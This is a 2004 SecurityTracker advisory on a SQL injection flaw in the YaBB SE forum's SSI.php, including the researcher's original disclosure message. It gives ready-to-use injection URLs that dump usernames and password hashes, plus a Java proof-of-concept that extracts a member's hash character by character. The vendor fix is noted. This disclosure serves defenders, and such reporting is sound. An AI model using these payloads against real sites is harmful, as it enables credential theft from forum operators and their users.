Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
YaBB SE 'SSI.php' Input Validation Flaw Permits SQL Injection
|
|
SecurityTracker Alert ID: 1008764
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 19 2004
|
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 1.5.4, 1.5.3, possibly earlier verions
|
Description: An input validation vulnerability was reported in YaBB SE in 'SSI.php'. A remote user can inject SQL commands.
It is reported that that the ID_MEMEBER parameter is not properly validated by the 'recentTopics' and 'welcome' functions. A remote
user can supply a specially crafted URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are
provided:
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME
N+S
ELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER
=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*
http://[target]/yabbse/SSI.php?function=wel
come&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+
Some demonstration
exploit code is available in the Source Message.
|
Impact: A remote user can execute arbitrary SQL commands on the underlying database. This can be exploited to view hashed passwords, for example.
|
Solution: The vendor has released a fixed version (1.5.5), available at:
http://www.yabbse.org/download.php
|
Vendor URL: www.yabbse.org/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "backspace" <backspace_2k@terra.es>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 19 Jan 2004 18:06:19 +0100
From: "backspace" <backspace_2k@terra.es>
Subject: Yabb SE SQL Injection
|
Summary:
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board). An SQL Injection vulnerability in the product allows a
remote attacker to insert malicious SQL statements.
Details:
Vulnerable Systems:
Yabb Se version 1.5.4 (tested), 1.5.3(tested) maybe others
Immune Systems:
Yabb Se version 1.5.5
Technical Details:
the file SSI.php has a number of functions that return some information
about the status of the forum like recent topics, boards statistics and so
on. Functions welcome and recentTopics are vulnerable to SQL injection
because the parameter ID_MEMBER is not checked against malicious input.
Example:
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mar
k_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_MSG+IN+(2,1)+AND+t.I
D_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=t.ID_BOARD+UNIO
N+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_memb
ers+/*
OR
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mar
k_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberN
ame,null,passwd,null,passwd,null,null,null,null,n
ull,null+FROM+yabbse_members+/*
those requests return a page showing all usernames and hashed passwords.
[General Discussion] test post by test January 01, 2001, 03:00:01 pm
[] admin by [hashed pass] January 01, 1970, 01:00:01 am
[] test_user by [hashed pass] January 01, 1970, 01:00:02 am
http://vulnhost/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+
BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+,+0+FROM+yabbse_members+WHERE+ID_MEMBER=1/*
this request return the value of the first character from the realName of
the user whose ID_MEMBER is 1.
Proof of concept code:
/*
* YabbSe SQL Injection test code
* The code is very ugly but it works OK
* Use at your own risk.
* compile:
* javac yabb.java
* exec:
* java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
* parameters are:
* java yabb [url with path] [database_prefix] [ID_MEMBER]
*/
import java.net.*;
import java.io.*;
public class yabb {
public static void main(String[] args) throws Exception {
boolean lastChar = false;
String Key = "";
for ( int count=1; count <= 32 ; count++)
{
URL yabbForum = new URL(args[0] +
"SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP
%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20
%20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*");
BufferedReader in = new BufferedReader(new
InputStreamReader(yabbForum.openStream()));
String inputLine;
inputLine = in.readLine();
int pos = inputLine.indexOf("action=im");
int pos2 = inputLine.indexOf(" ", pos + 11);
if ( pos < 0 )
{
System.out.println("ERROR: The server doesn't return any data");
System.exit(0);
}
String theNumber = inputLine.substring( pos + 11, pos2);
System.out.println(theNumber + "-" + new
Character((char)Integer.parseInt(theNumber.trim())).toString());
Key += new Character((char)Integer.parseInt(theNumber.trim())).toString();
in.close();
}
System.out.println("Hashed password : " + Key);
}
Vendor status:
The vendor was contacted and the vulnerabilities were fixed.
Solution:
Upgrade to version 1.5.5
Credits:
Credits go to BackSpace
|
|
Go to the Top of This SecurityTracker Archive Page
|
